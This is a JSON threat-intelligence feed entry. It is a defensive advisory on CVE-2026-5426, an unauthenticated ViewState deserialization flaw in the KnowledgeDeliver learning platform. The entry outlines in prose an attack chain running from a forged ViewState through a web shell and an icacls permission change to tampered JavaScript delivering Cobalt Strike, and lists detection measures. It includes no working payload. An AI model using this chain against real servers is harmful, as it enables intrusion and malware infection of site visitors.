{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/tags/knowledgedeliver/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[{"cvss":7.5,"id":"CVE-2026-5426"}],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["KnowledgeDeliver"],"_cs_severities":["critical"],"_cs_tags":["knowledgedeliver","viewstate-deserialization","rce","web-shell","cobalt-strike","cve-2026-5426"],"_cs_type":"advisory","_cs_vendors":["Digital Knowledge"],"content_html":"\u003cp\u003eIn late 2025, Mandiant investigated a security incident involving a compromised KnowledgeDeliver web server. KnowledgeDeliver, a Learning Management System (LMS) by Digital Knowledge, was found to be vulnerable to unauthenticated Remote Code Execution (RCE) due to the use of identical pre-shared ASP.NET machine keys across multiple customer deployments before February 24, 2026. This vulnerability, tracked as CVE-2026-5426, allowed an unknown threat actor to inject malicious code into the LMS platform. The attacker\u0026rsquo;s goal was to compromise users visiting the site through web shell deployment, file tampering, and eventual Cobalt Strike BEACON infection of user workstations. This highlights the critical importance of maintaining unique and secure machine keys for ASP.NET applications.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a KnowledgeDeliver instance with default ASP.NET machine keys.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious ViewState payload, exploiting CVE-2026-5426, by deserializing arbitrary objects.\u003c/li\u003e\n\u003cli\u003eThe attacker sends the crafted ViewState payload within the \u003ccode\u003e__VIEWSTATE\u003c/code\u003e parameter in an HTTP POST request to the vulnerable KnowledgeDeliver server.\u003c/li\u003e\n\u003cli\u003eThe server deserializes the malicious ViewState, leading to code execution within the \u003ccode\u003ew3wp.exe\u003c/code\u003e process.\u003c/li\u003e\n\u003cli\u003eThe attacker deploys the BLUEBEAM (.NET-based Godzilla) in-memory web shell within the \u003ccode\u003ew3wp.exe\u003c/code\u003e process for persistence and command execution.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the \u003ccode\u003eicacls\u003c/code\u003e command to grant \u0026ldquo;Everyone\u0026rdquo; full access to the web application directory, escalating privileges.\u003c/li\u003e\n\u003cli\u003eThe attacker modifies a JavaScript file to display a fake security alert, prompting users to install a malicious \u0026ldquo;security authentication plugin\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003eThe modified JavaScript silently loads a remote malicious script hosted on an attacker-controlled domain, ultimately leading to Cobalt Strike BEACON infection of user workstations.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5426 allows an attacker to achieve unauthenticated remote code execution on KnowledgeDeliver servers. This can lead to the deployment of web shells, file tampering, and the infection of user workstations with malware such as Cobalt Strike. The modified JavaScript file displays a fake security alert, which tricks users into installing a malicious \u0026ldquo;security authentication plugin\u0026rdquo;, leading to further compromise. This incident underscores the critical risk posed by shared machine keys in ASP.NET applications.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor Windows Application logs for Event ID 1316 from the \u003ccode\u003eASP.NET 4.0.30319.0\u003c/code\u003e source related to ViewState verification failures, as described in the overview, especially event codes 4009.\u003c/li\u003e\n\u003cli\u003eMonitor for unusual child processes spawned by \u003ccode\u003ew3wp.exe\u003c/code\u003e (IIS worker process), such as \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003ewhoami\u003c/code\u003e, and \u003ccode\u003epowershell.exe\u003c/code\u003e, as mentioned in the \u0026ldquo;Suspicious Process Activity\u0026rdquo; section.\u003c/li\u003e\n\u003cli\u003eImplement file integrity monitoring for \u003ccode\u003e.js\u003c/code\u003e, \u003ccode\u003e.aspx\u003c/code\u003e, and \u003ccode\u003e.config\u003c/code\u003e files within the web root to detect unauthorized modifications, including the addition of remote script loaders, as described in the \u0026ldquo;File Integrity Monitoring\u0026rdquo; section.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect KnowledgeDeliver BLUEBEAM Webshell Deployment\u0026rdquo; to detect post-exploitation activity related to web shell deployment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-25T05:10:52Z","date_published":"2026-05-25T05:10:52Z","id":"https://feed.craftedsignal.io/briefs/2026-05-knowledgedeliver-viewstate-deserialization/","summary":"An unauthenticated remote code execution vulnerability, CVE-2026-5426, in Digital Knowledge's KnowledgeDeliver LMS platform due to shared ASP.NET machine keys allows attackers to inject malicious code, ultimately leading to Cobalt Strike infection of user workstations.","title":"KnowledgeDeliver ViewState Deserialization Vulnerability Exploitation","url":"https://feed.craftedsignal.io/briefs/2026-05-knowledgedeliver-viewstate-deserialization/"}],"language":"en","title":"CraftedSignal Threat Feed — Knowledgedeliver","version":"https://jsonfeed.org/version/1.1"}